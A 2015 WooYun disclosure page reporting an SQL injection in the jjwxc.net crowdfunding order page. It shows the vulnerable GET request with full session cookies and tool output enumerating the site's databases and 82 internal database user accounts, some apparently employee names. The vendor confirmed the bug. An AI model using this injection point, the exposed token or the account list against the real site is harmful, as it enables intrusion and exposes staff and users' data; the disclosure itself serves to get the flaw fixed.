当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133415

漏洞标题:晋江文学之文字具象化工坊sql注入漏洞

相关厂商:晋江文学

漏洞作者: nina

提交时间:2015-08-12 11:16

修复时间:2015-09-26 17:42

公开时间:2015-09-26 17:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-12: 细节已通知厂商并且等待厂商处理中
2015-08-12: 厂商已经确认,细节仅向厂商公开
2015-08-22: 细节向核心白帽子及相关领域专家公开
2015-09-01: 细节向普通白帽子公开
2015-09-11: 细节向实习白帽子公开
2015-09-26: 细节向公众公开

简要描述:

rt

详细说明:

注入点

GET /crowdfunding/supportOrder.php?id=33&priceid=149 HTTP/1.1
Host: my.jjwxc.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: CNZZDATA30075907=cnzz_eid%3D434848196-1439182460-http%253A%252F%252Fwww.jjwxc.net%252F%26ntime%3D1439284534; __gads=ID=dd635bafc2021415:T=1439186463:S=ALNI_Mb9d4kJqQtFRy9J44HKB7nNC-KKZg; timeOffset_o=4418.89990234375; ispayuser=18289630-1; CNZZDATA1255436189=738594318-1439185101-http%253A%252F%252Fmy.jjwxc.net%252F%7C1439285538; Hm_lvt_9abb8a0f7324f452d17274e5caa6a727=1439201884; ad_play_index=19; Hm_lvt_2621cceb855168162d28a33806e75820=1439273501; Hm_lpvt_2621cceb855168162d28a33806e75820=1439273501; testcookie=yes; clicktype=; bbstoken=e836c081396913d7456d7173f607b4ca; nicknameAndsign=2%257E%2529%2524woo126; token=MTgyODk2MzB8NmFjYzJkODc3Njg2M2ZiMmRhMTlhM2ExYmI3MjkwN2F8fHRlc3RfY3VtdEAxMjYuY29tfHx8MXx8fOasoui%2FjuaCqO%2B8jOaZi%2Baxn%2BeUqOaIt3wwfGVtYWls; sms_total=3
Connection: keep-alive


[18:14:09] [INFO] fetching database names
[18:14:09] [INFO] the SQL query used returns 7 entries
[18:14:10] [INFO] retrieved: "information_schema"
[18:14:10] [INFO] retrieved: "ip"
[18:14:10] [INFO] retrieved: "mysql"
[18:14:10] [INFO] retrieved: "performance_schema"
[18:14:10] [INFO] retrieved: "phpmyadmin"
[18:14:11] [INFO] retrieved: "selfnovel"
[18:14:11] [INFO] retrieved: "test"
available databases [7]:
[*] information_schema
[*] ip
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] selfnovel
[*] test


database management system users [82]:
[*] '3g'@'10.9.%'
[*] '_diaosi'@'10.9.%'
[*] '_duchengbin'@'10.9.%'
[*] '_huangyanming'@'10.9.%'
[*] '_humengling'@'10.9.%'
[*] '_limeng'@'10.9.%'
[*] '_liuhuan'@'10.9.%'
[*] '_liupeng'@'10.9.%'
[*] '_liuxudong'@'10.9.%'
[*] '_liuxuemeng'@'10.9.%'
[*] '_qiandeyang'@'10.9.%'
[*] '_shiminmin'@'10.9.%'
[*] '_sushang'@'10.9.%'
[*] '_wangqing'@'10.9.%'
[*] '_xiaomingliang'@'10.9.%'
[*] '_xiewenbin'@'10.9.%'
[*] '_yanglili'@'10.9.%'
[*] '_yelongyi'@'10.9.%'
[*] '_zhangchen'@'10.9.%'
[*] '_zhangfeng'@'10.9.%'
[*] '_zhaoyu'@'10.9.%'
[*] 'api_master'@'10.9.%'
[*] 'api_slave'@'10.9.%'
[*] 'backend'@'10.9.%'
[*] 'backup'@'10.9.%'
[*] 'bbs_master'@'10.9.%'
[*] 'bbs_slave'@'10.9.%'
[*] 'bobtestuser'@'10.9.%'
[*] 'bookshop_master'@'10.9.%'
[*] 'bookshop_slave'@'10.9.%'
[*] 'cloud_master'@'10.9.%'
[*] 'cloud_slave'@'10.9.%'
[*] 'cron'@'10.9.%'
[*] 'duchengbin'@'10.9.%'
[*] 'files_master'@'10.9.%'
[*] 'files_slave'@'10.9.%'
[*] 'game_master'@'10.9.%'
[*] 'game_slave'@'10.9.%'
[*] 'gaoshuai'@'10.9.%'
[*] 'harem_master'@'10.9.%'
[*] 'harem_slave'@'10.9.%'
[*] 'help_master'@'10.9.%'
[*] 'help_slave'@'10.9.%'
[*] 'huangyanming'@'10.9.%'
[*] 'iceheart'@'10.9.%'
[*] 'index_creator'@'10.9.%'
[*] 'jishu_duchengbin'@'10.9.%'
[*] 'jishu_liupeng'@'10.9.%'
[*] 'jishu_qiandeyang'@'10.9.%'
[*] 'jishu_sushang'@'10.9.%'
[*] 'jishu_xiewenbin'@'10.9.%'
[*] 'jishu_zhangchen'@'10.9.%'
[*] 'jishu_zhaoyu'@'10.9.%'
[*] 'liupeng'@'10.9.%'
[*] 'liuxudong'@'10.9.%'
[*] 'monitor'@'10.9.%'
[*] 'monty'@'10.9.%'
[*] 'mtop'@'localhost'
[*] 'mysql-zrm-backup'@'%'
[*] 'open_master'@'10.9.%'
[*] 'open_slave'@'10.9.%'
[*] 'qiandeyang'@'10.9.%'
[*] 'readonlyuser'@'10.9.%'
[*] 'root'@'localhost'
[*] 'sales_master'@'10.9.%'
[*] 'sales_slave'@'10.9.%'
[*] 'service'@'10.9.%'
[*] 'superdong'@'10.9.%'
[*] 'sushang'@'10.9.%'
[*] 'sync'@'10.9.%'
[*] 'testuser'@'10.9.%'
[*] 'wangxian'@'10.9.%'
[*] 'wap'@'10.9.%'
[*] 'wap_master'@'10.9.%'
[*] 'wap_slave'@'10.9.%'
[*] 'wmm'@'10.9.%'
[*] 'www_master'@'10.9.%'
[*] 'www_slave'@'10.9.%'
[*] 'xiewenbin'@'10.9.%'
[*] 'zhangfeng'@'10.9.%'
[*] 'zhangjun'@'10.9.%'
[*] 'zhaoyu'@'10.9.%'


漏洞证明:

同上

修复方案:

过滤

版权声明:转载请注明来源 nina@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-12 17:40

厂商回复:

已经安排技术人员处理,非常感谢您的支持!

最新状态:

暂无


漏洞评价:

评论